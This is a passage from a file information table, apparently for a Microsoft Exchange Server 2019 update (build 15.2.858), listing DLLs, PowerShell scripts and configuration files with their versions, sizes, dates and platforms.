15.2.858.9| 101,248| 04-Apr-2021| 08:43| x86 \nBigfunnel.ranking.dll| 15.2.858.9| 109,448| 04-Apr-2021| 08:36| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.858.9| 3,634,568| 04-Apr-2021| 08:43| x86 \nBigfunnel.tracing.dll| 15.2.858.9| 42,880| 04-Apr-2021| 08:31| x86 \nBigfunnel.wordbreakers.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:33| x86 \nCafe_airfilter_dll| 15.2.858.9| 42,872| 04-Apr-2021| 08:33| x64 \nCafe_exppw_dll| 15.2.858.9| 83,352| 04-Apr-2021| 08:39| x64 \nCafe_owaauth_dll| 15.2.858.9| 92,040| 04-Apr-2021| 08:39| x64 \nCalcalculation.ps1| Not applicable| 42,097| 04-Apr-2021| 08:39| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,606| 04-Apr-2021| 08:39| Not applicable \nChksgfiles.dll| 15.2.858.9| 57,216| 04-Apr-2021| 08:39| x64 \nCitsconstants.ps1| Not applicable| 15,805| 04-Apr-2021| 08:36| Not applicable \nCitslibrary.ps1| Not applicable| 82,680| 04-Apr-2021| 08:36| Not applicable \nCitstypes.ps1| Not applicable| 14,464| 04-Apr-2021| 08:36| Not applicable \nClassificationengine_mce| 15.2.858.9| 1,693,576| 04-Apr-2021| 08:27| Not applicable \nClusmsg.dll| 15.2.858.9| 134,024| 04-Apr-2021| 08:41| x64 \nCoconet.dll| 15.2.858.9| 48,008| 04-Apr-2021| 08:31| x64 \nCollectovermetrics.ps1| Not applicable| 81,684| 04-Apr-2021| 08:39| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,870| 04-Apr-2021| 08:38| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,931| 04-Apr-2021| 08:33| Not applicable \nComplianceauditservice.exe| 15.2.858.10| 39,832| 04-Apr-2021| 08:39| x86 \nConfigureadam.ps1| Not applicable| 22,804| 04-Apr-2021| 08:35| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,348| 04-Apr-2021| 08:38| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,035| 04-Apr-2021| 08:39| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,810| 04-Apr-2021| 08:36| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,868| 04-Apr-2021| 08:37| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,323| 04-Apr-2021| 08:37| Not applicable \nConnectfunctions.ps1| Not applicable| 37,141| 04-Apr-2021| 08:43| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,420| 04-Apr-2021| 08:43| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,272| 04-Apr-2021| 08:31| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,089| 04-Apr-2021| 08:37| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,572| 04-Apr-2021| 08:38| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,805| 04-Apr-2021| 08:37| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,952| 04-Apr-2021| 08:38| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts_exsmime.dll| 15.2.858.9| 380,792| 04-Apr-2021| 08:31| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.858.9| 1,686,936| 04-Apr-2021| 08:32| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:38| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:39| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:39| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:38| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:35| x86 \nDagcommonlibrary.ps1| Not applicable| 60,226| 04-Apr-2021| 08:36| Not applicable \nDependentassemblygenerator.exe| 15.2.858.9| 22,416| 04-Apr-2021| 08:39| x86 \nDiaghelper.dll| 15.2.858.9| 66,968| 04-Apr-2021| 08:32| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,334| 04-Apr-2021| 08:38| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,402| 04-Apr-2021| 08:37| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,229| 04-Apr-2021| 08:37| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,690| 04-Apr-2021| 08:33| Not applicable \nDisklockerapi.dll| Not applicable| 22,392| 04-Apr-2021| 08:38| x64 \nDlmigrationmodule.psm1| Not applicable| 39,620| 04-Apr-2021| 08:36| Not applicable \nDsaccessperf.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:30| x64 \nDscperf.dll| 15.2.858.9| 32,640| 04-Apr-2021| 08:42| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.858.9| 1,686,936| 04-Apr-2021| 08:32| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.858.9| 601,464| 04-Apr-2021| 08:33| x86 \nEcpperfcounters.xml| Not applicable| 31,144| 04-Apr-2021| 08:28| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nEdgetransport.exe| 15.2.858.10| 49,536| 04-Apr-2021| 08:39| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:39| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:43| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:44| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:38| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,664| 04-Apr-2021| 08:39| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:44| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,404| 04-Apr-2021| 08:35| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,603| 04-Apr-2021| 08:36| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,624| 04-Apr-2021| 08:36| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,634| 04-Apr-2021| 08:38| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,952| 04-Apr-2021| 08:37| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,687| 04-Apr-2021| 08:33| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x86 \nEscprint.dll| 15.2.858.9| 20,360| 04-Apr-2021| 08:39| x64 \nEse.dll| 15.2.858.9| 3,741,584| 04-Apr-2021| 08:31| x64 \nEseback2.dll| 15.2.858.9| 350,080| 04-Apr-2021| 08:29| x64 \nEsebcli2.dll| 15.2.858.9| 318,328| 04-Apr-2021| 08:41| x64 \nEseperf.dll| 15.2.858.9| 108,928| 04-Apr-2021| 08:40| x64 \nEseutil.exe| 15.2.858.9| 425,368| 04-Apr-2021| 08:42| x64 \nEsevss.dll| 15.2.858.9| 44,440| 04-Apr-2021| 08:35| x64 \nEtweseproviderresources.dll| 15.2.858.9| 101,256| 04-Apr-2021| 08:39| x64 \nEventperf.dll| 15.2.858.9| 59,768| 04-Apr-2021| 08:27| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,093| 04-Apr-2021| 08:44| Not applicable \nExchange.format.ps1xml| Not applicable| 649,694| 04-Apr-2021| 08:43| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,323| 04-Apr-2021| 08:43| Not applicable \nExchange.ps1| Not applicable| 20,807| 04-Apr-2021| 08:43| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,535| 04-Apr-2021| 08:38| Not applicable \nExchange.types.ps1xml| Not applicable| 365,149| 04-Apr-2021| 08:44| Not applicable \nExchangeudfcommon.dll| 15.2.858.9| 122,744| 04-Apr-2021| 08:39| x86 \nExchangeudfs.dll| 15.2.858.9| 272,776| 04-Apr-2021| 08:39| x86 \nExchmem.dll| 15.2.858.9| 86,400| 04-Apr-2021| 08:29| x64 \nExchsetupmsg.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:39| x64 \nExdbfailureitemapi.dll| Not applicable| 27,032| 04-Apr-2021| 08:38| x64 \nExdbmsg.dll| 15.2.858.9| 230,800| 04-Apr-2021| 08:39| x64 \nExeventperfplugin.dll| 15.2.858.9| 25,472| 04-Apr-2021| 08:32| x64 \nExmime.dll| 15.2.858.9| 364,928| 04-Apr-2021| 08:39| x64 \nExportedgeconfig.ps1| Not applicable| 27,431| 04-Apr-2021| 08:37| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,594| 04-Apr-2021| 08:38| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,242| 04-Apr-2021| 08:36| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,374| 04-Apr-2021| 08:39| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,157| 04-Apr-2021| 08:37| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,080| 04-Apr-2021| 08:37| Not applicable \nExppw.dll| 15.2.858.9| 83,352| 04-Apr-2021| 08:39| x64 \nExprfdll.dll| 15.2.858.9| 26,520| 04-Apr-2021| 08:43| x64 \nExrpc32.dll| 15.2.858.9| 2,029,448| 04-Apr-2021| 08:34| x64 \nExrw.dll| 15.2.858.9| 28,056| 04-Apr-2021| 08:30| x64 \nExsetdata.dll| 15.2.858.9| 2,779,528| 04-Apr-2021| 08:39| x64 \nExsetup.exe| 15.2.858.10| 35,224| 04-Apr-2021| 08:39| x86 \nExsetupui.exe| 15.2.858.10| 471,936| 04-Apr-2021| 08:39| x86 \nExtrace.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:31| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.858.9| 601,464| 04-Apr-2021| 08:33| x86 \nExwatson.dll| 15.2.858.9| 44,936| 04-Apr-2021| 08:27| x64 \nFastioext.dll| 15.2.858.9| 60,312| 04-Apr-2021| 08:39| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,630| 04-Apr-2021| 08:38| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,227| 04-Apr-2021| 08:39| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,759| 04-Apr-2021| 08:39| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,404| 04-Apr-2021| 08:33| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,656| 04-Apr-2021| 08:33| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,758| 04-Apr-2021| 08:39| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,627| 04-Apr-2021| 08:39| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,603| 04-Apr-2021| 08:38| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 04-Apr-2021| 08:28| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,344| 04-Apr-2021| 08:39| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,258| 04-Apr-2021| 08:39| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,753| 04-Apr-2021| 08:39| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,729| 04-Apr-2021| 08:39| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,759| 04-Apr-2021| 08:39| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,633| 04-Apr-2021| 08:38| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,657| 04-Apr-2021| 08:39| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,756| 04-Apr-2021| 08:38| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,633| 04-Apr-2021| 08:38| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 04-Apr-2021| 08:29| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,639,490| 04-Apr-2021| 08:28| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,776| 04-Apr-2021| 08:39| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,633| 04-Apr-2021| 08:39| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,639| 04-Apr-2021| 08:39| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 04-Apr-2021| 08:27| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,267| 04-Apr-2021| 08:34| Not applicable \nFilteringpowershell.dll| 15.2.858.9| 223,096| 04-Apr-2021| 08:28| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,668| 04-Apr-2021| 08:27| Not applicable \nFiltermodule.dll| 15.2.858.9| 180,120| 04-Apr-2021| 08:28| x64 \nFipexeuperfctrresource.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:32| x64 \nFipexeventsresource.dll| 15.2.858.9| 44,944| 04-Apr-2021| 08:33| x64 \nFipexperfctrresource.dll| 15.2.858.9| 32,664| 04-Apr-2021| 08:27| x64 \nFirewallres.dll| 15.2.858.9| 72,584| 04-Apr-2021| 08:32| x64 \nFms.exe| 15.2.858.9| 1,350,016| 04-Apr-2021| 08:28| x64 \nForefrontactivedirectoryconnector.exe| 15.2.858.9| 110,968| 04-Apr-2021| 08:39| x64 \nFpsdiag.exe| 15.2.858.9| 18,824| 04-Apr-2021| 08:28| x86 \nFsccachedfilemanagedlocal.dll| 15.2.858.9| 822,144| 04-Apr-2021| 08:29| x64 \nFscconfigsupport.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:28| x86 \nFscconfigurationserver.exe| 15.2.858.9| 430,976| 04-Apr-2021| 08:27| x64 \nFscconfigurationserverinterfaces.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:32| x86 \nFsccrypto.dll| 15.2.858.9| 208,792| 04-Apr-2021| 08:28| x64 \nFscipcinterfaceslocal.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:27| x86 \nFscipclocal.dll| 15.2.858.9| 38,264| 04-Apr-2021| 08:27| x86 \nFscsqmuploader.exe| 15.2.858.9| 453,528| 04-Apr-2021| 08:28| x64 \nGetucpool.ps1| Not applicable| 19,811| 04-Apr-2021| 08:36| Not applicable \nGetvalidengines.ps1| Not applicable| 13,274| 04-Apr-2021| 08:36| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,829| 04-Apr-2021| 08:38| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,655| 04-Apr-2021| 08:38| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,711| 04-Apr-2021| 08:39| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,775| 04-Apr-2021| 08:39| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,498| 04-Apr-2021| 08:39| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,689| 04-Apr-2021| 08:38| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,790| 04-Apr-2021| 08:39| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,376| 04-Apr-2021| 08:36| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,983| 04-Apr-2021| 08:36| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,062| 04-Apr-2021| 08:38| Not applicable \nGet_storetrace.ps1| Not applicable| 51,871| 04-Apr-2021| 08:39| Not applicable \nHuffman_xpress.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:30| x64 \nImportedgeconfig.ps1| Not applicable| 77,280| 04-Apr-2021| 08:37| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,516| 04-Apr-2021| 08:37| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,858| 04-Apr-2021| 08:38| Not applicable \nInproxy.dll| 15.2.858.9| 85,896| 04-Apr-2021| 08:34| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,523| 04-Apr-2021| 08:39| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,929| 04-Apr-2021| 08:39| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,983| 04-Apr-2021| 08:38| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 107,392| 04-Apr-2021| 08:30| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 20,360| 04-Apr-2021| 08:33| Not applicable \nInterop.certenroll.dll| 15.2.858.9| 142,736| 04-Apr-2021| 08:31| x86 \nInterop.licenseinfointerface.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:33| x86 \nInterop.netfw.dll| 15.2.858.9| 34,184| 04-Apr-2021| 08:28| x86 \nInterop.plalibrary.dll| 15.2.858.9| 72,600| 04-Apr-2021| 08:28| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 27,016| 04-Apr-2021| 08:33| Not applicable \nInterop.taskscheduler.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:27| x86 \nInterop.wuapilib.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:39| x86 \nInterop.xenroll.dll| 15.2.858.9| 39,816| 04-Apr-2021| 08:31| x86 \nKerbauth.dll| 15.2.858.9| 62,848| 04-Apr-2021| 08:42| x64 \nLicenseinfointerface.dll| 15.2.858.9| 643,464| 04-Apr-2021| 08:29| x64 \nLpversioning.xml| Not applicable| 20,470| 04-Apr-2021| 08:34| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,920| 04-Apr-2021| 08:39| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.858.9| 138,640| 04-Apr-2021| 08:34| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,277| 04-Apr-2021| 08:39| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,372| 04-Apr-2021| 08:38| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,127| 04-Apr-2021| 08:36| Not applicable \nMce.dll| 15.2.858.9| 1,693,576| 04-Apr-2021| 08:27| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,487| 04-Apr-2021| 08:39| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,663| 04-Apr-2021| 08:37| Not applicable \nMicrosoft.database.isam.dll| 15.2.858.9| 127,880| 04-Apr-2021| 08:39| x86 \nMicrosoft.dkm.proxy.dll| 15.2.858.9| 26,008| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.858.9| 68,488| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.858.10| 233,368| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.858.9| 43,400| 04-Apr-2021| 08:38| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.858.10| 1,776,000| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.858.10| 505,216| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.858.10| 76,160| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.858.10| 135,568| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.858.9| 23,448| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.858.10| 27,016| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.858.10| 53,656| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.assistants.dll| 15.2.858.10| 925,056| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.858.9| 25,976| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.858.9| 43,400| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.858.10| 15,232| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.858.9| 14,720| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.858.10| 70,528| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.858.10| 94,600| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.858.10| 36,744| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.858.9| 79,752| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.858.10| 396,184| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.858.9| 21,400| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.858.10| 57,240| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.858.10| 14,744| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.858.10| 35,720| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.858.9| 276,352| 04-Apr-2021| 08:31| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.858.9| 16,256| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.858.10| 25,984| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.858.10| 23,448| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.858.10| 377,752| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.858.9| 83,848| 04-Apr-2021| 08:30| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.858.10| 2,971,008| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.858.10| 5,029,784| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.858.9| 893,848| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.858.10| 413,584| 04-Apr-2021| 08:38| x86 